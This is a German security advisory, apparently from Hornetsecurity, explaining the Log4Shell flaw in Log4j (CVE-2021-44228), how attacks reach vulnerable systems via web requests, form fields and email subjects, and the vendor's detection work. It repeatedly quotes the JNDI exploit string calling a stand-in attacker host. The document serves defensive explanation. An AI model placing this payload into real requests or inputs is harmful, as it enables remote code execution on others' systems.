Warnstufe Rot: Warnung vor kritischer Sicherheitslücke Log4Shell

				<div>
			<div>
			
			
			<div>
			
			
			<div><h3>Hintergrund</h3></div>
		</div><div>
			
			
			<div><p>CVE-2021-44228, oder auch bekannt als Log4Shell, ist eine kritische Sicherheitslücke im beliebten Java-Logging-Paket Log4j und ist etwa seit dem 10. Dezember 2021 bekannt.</p>

Log4j wird von zahlreichen JAVA-Unternehmenssoftwares zur Implementierung der Protokollierung verwendet. Die Sicherheitslücke wird durch eine im Jahr 2013 hinzugefügte Funktion verursacht, die die Erweiterung von (lokalen Umgebungs-)Variablen in Protokollmeldungen ermöglicht. So würde z.B. `${env:FOOBAR}` in einer Logmeldung zur Umgebungsvariablen `FOOBAR` expandieren. Es erlaubt zudem die Erweiterung von Variablen im Java Naming and Directory Interface (JNDI) Kontext. Hier manifestiert sich die Sicherheitslücke. Wenn die Zeichenkette `${jndi:ldap://attacker-controlled.com/x}` über Log4j protokolliert wird, fordert das System die vom Angreifer kontrollierte URI über das JNDI an, lädt dann eine beliebige vom Hacker kontrollierte JAVA-Klassendatei herunter und führt sie aus, was zu einer Schwachstelle bei der Remotecodeausführung führt.

			<div><h3>Vorgehensweise bei einem Angriff</h3></div>
		</div><div>
			
			
			<div><p>Die Sicherheitslücke ist so gefährlich, weil sie so einfach auszunutzen ist: Ein Angriff muss ein Opfer nur dazu bringen, seine Exploit-Zeichenkette `${jndi:ldap://attacker-controlled.com/x}` in eine Protokolldatei mit Log4j zu schreiben. Log4j ist praktisch die Standard-Protokollierungsbibliothek für JAVA-Unternehmensanwendungen und macht sie anfällig für CVE-2021-44228. Die meisten Anwendungen protokollieren standardmäßig bestimmte Aktionen, z. B. protokolliert ein Webserver Webanfragen. Ein Angreifer müsste lediglich die URL `http://vulnerable-webserver.com/${jndi:ldap://attacker-controlled.com/x}` anfordern oder seinen User-Agent-String auf den Exploit setzen, um ein System zu kompromittieren.<br />

Die Exploit-Zeichenkette kann über jeden beliebigen Pfad transportiert werden, solange sie letztlich von einer JAVA-Anwendung mit Log4j protokolliert wird. Zum Beispiel könnte ein JAVA-basierter E-Mail-Client eine E-Mail erhalten, deren Betreff auf die Log4Shell-Exploit-Zeichenkette gesetzt ist. Sobald der JAVA-basierte E-Mail-Client über die Log4j-Bibliothek in seine Protokolle schreibt, dass er eine neue E-Mail erhalten hat, würde der Exploit ausgelöst.

			<div><h3>Stellungnahme Hornetsecurity</h3></div>
		</div><div>
			
			
			<div><p>Hornetsecurity erkennt bereits den bösartigen Exploit-String in E-Mails, hat aber bisher keine Angreifer beobachtet, die E-Mails direkt als Angriffsvektor nutzen. Die bisher beobachteten Fälle (neben Sicherheitsunternehmen und Kunden, die auf die Schwachstelle testen) stammen von Web-Formularen, in die die Angreifer den Log4Shell-Exploit schrieben, bei denen der Besitzer des Web-Formulars dann eine Benachrichtigungs-E-Mail mit den Feldern des Formulars erhielt, die dann offenkundig den Exploit-String enthielten.<br />

Die Threat Researcher des Hornetsecurity Security Labs überwachen E-Mails auf CVE-2021-44228-Exploit-Muster und werden diese Erkennung ständig erweitern, um die Filter an neue Verschleierungen anzupassen und auf mögliche gezielte E-Mail-Kampagnen mit dem Log4Shell-Exploit vorbereitet zu sein.

			<div><h3>Referenzen</h3></div>
		</div><div>
			
			
			<div><ul>
  • BSI: https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.html
  • CISA:https://www.cisa.gov/news/2021/12/11/statement-cisa-director-easterly-log4j-vulnerability
  • 		</div>
    			
    			
    		</div><p>Der Beitrag <a href="https://www.hornetsecurity.com/en/threat-research/log4j-sicherheitsluecke/" rel="noreferrer" target="_blank">Warnstufe Rot: Warnung vor kritischer Sicherheitslücke Log4Shell</a> erschien zuerst auf <a href="https://www.hornetsecurity.com/en/" rel="noreferrer" target="_blank">Hornetsecurity</a>.</p>
    

    Article Link: Warnstufe Rot: Warnung vor kritischer Sicherheitslücke Log4Shell - Hornetsecurity